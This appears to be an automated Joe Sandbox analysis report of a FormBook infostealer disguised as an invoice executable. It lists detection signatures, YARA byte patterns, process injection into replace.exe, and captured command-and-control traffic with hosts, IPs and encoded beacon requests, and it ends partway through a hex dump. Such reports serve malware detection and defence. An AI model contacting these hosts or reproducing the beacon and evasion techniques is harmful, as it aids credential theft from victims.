Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HYCO_Invoices MS2 & MS3.exe

Overview

General Information

Sample name:HYCO_Invoices MS2 & MS3.exe
Analysis ID:1427199
MD5:96fe3d00e8b2ba36dfb240a004ab28e1
SHA1:757169009af1210acab01e9a2385e5cca4b94f20
SHA256:57b81292b61a36171a2ad822d255aae878a8f9ca187efb43da94c7865c8388c4
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HYCO_Invoices MS2 & MS3.exe (PID: 1020 cmdline: "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" MD5: 96FE3D00E8B2BA36DFB240A004AB28E1)
    • HYCO_Invoices MS2 & MS3.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" MD5: 96FE3D00E8B2BA36DFB240A004AB28E1)
    • HYCO_Invoices MS2 & MS3.exe (PID: 6528 cmdline: "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe" MD5: 96FE3D00E8B2BA36DFB240A004AB28E1)
      • JlRhrxMCYjuGzWWvXkXNzhLX.exe (PID: 5580 cmdline: "C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • JlRhrxMCYjuGzWWvXkXNzhLX.exe (PID: 2680 cmdline: "C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2088 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2cf83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16552:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:04/17/24-08:39:42.561650
            SID:2855465
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/17/24-08:40:41.121135
            SID:2855465
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/17/24-08:39:17.162071
            SID:2855465
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/17/24-08:40:11.246310
            SID:2855465
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/17/24-08:39:56.404713
            SID:2855465
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: HYCO_Invoices MS2 & MS3.exeReversingLabs: Detection: 47%
            Source: HYCO_Invoices MS2 & MS3.exeVirustotal: Detection: 40%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: HYCO_Invoices MS2 & MS3.exeJoe Sandbox ML: detected
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: replace.pdb source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000000.1820275052.000000000012E000.00000002.00000001.01000000.0000000A.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000000.1974653157.000000000012E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HYCO_Invoices MS2 & MS3.exe, HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000005.00000003.1900193345.0000000003494000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000005.00000003.1897713849.00000000032E1000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1BC00 FindFirstFileW,FindNextFileW,FindClose,5_2_00E1BC00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax5_2_00E09460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then pop edi5_2_00E1210D

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49738 -> 79.98.25.1:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 91.195.240.117:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49747 -> 64.190.62.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49751 -> 217.76.128.34:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49759 -> 178.211.137.59:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.www60270.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.117 91.195.240.117
            Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
            Source: Joe Sandbox ViewIP Address: 217.76.128.34 217.76.128.34
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: TIS-DIALOG-ASRU TIS-DIALOG-ASRU
            Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=7syVtg0wm45Xa+0QzpeywUsAZ6yAPvjdu6gzDOasV7nOCe5fUnUhGq++vYwq6UnaX+M1S/9yW1y2BV80NTALyVFlDkUwTwEaqx89+DAXSUPaXuqsOTbI6d4=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.choosejungmann.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /aleu/?QbZ=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&PL=0TtPMJQHYL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
            Source: unknownDNS traffic detected: queries for: www.maxiwalls.com
            Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.choosejungmann.comOrigin: http://www.choosejungmann.comContent-Type: application/x-www-form-urlencodedContent-Length: 200Cache-Control: max-age=0Connection: closeReferer: http://www.choosejungmann.com/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 51 62 5a 3d 32 75 61 31 75 55 52 32 78 5a 64 6c 62 75 34 5a 68 70 79 4d 39 69 6f 46 61 4b 69 5a 4e 63 50 4f 71 34 30 43 4a 39 72 6c 59 4c 6a 2b 49 4d 4a 62 63 43 6b 73 47 35 72 37 70 37 38 33 39 47 32 6b 61 39 63 33 54 39 78 67 57 47 57 49 4d 41 63 70 64 52 42 47 71 42 63 31 4d 32 55 64 56 53 30 43 6e 42 34 4a 7a 57 63 66 41 6c 50 50 57 38 2b 71 4d 79 4f 51 67 36 6c 77 63 6b 35 32 69 46 42 55 6f 36 48 4e 44 53 59 53 69 34 31 44 75 7a 2f 6f 65 45 48 66 35 41 6a 72 70 47 36 43 45 47 51 72 46 66 67 38 30 64 47 49 4c 4b 4d 6d 4c 74 67 4a 6a 63 53 56 54 4e 36 4f 6c 63 54 79 42 69 59 69 41 41 3d 3d Data Ascii: QbZ=2ua1uUR2xZdlbu4ZhpyM9ioFaKiZNcPOq40CJ9rlYLj+IMJbcCksG5r7p7839G2ka9c3T9xgWGWIMAcpdRBGqBc1M2UdVS0CnB4JzWcfAlPPW8+qMyOQg6lwck52iFBUo6HNDSYSi41Duz/oeEHf5AjrpG6CEGQrFfg80dGILKMmLtgJjcSVTN6OlcTyBiYiAA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:02 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:05 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:08 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 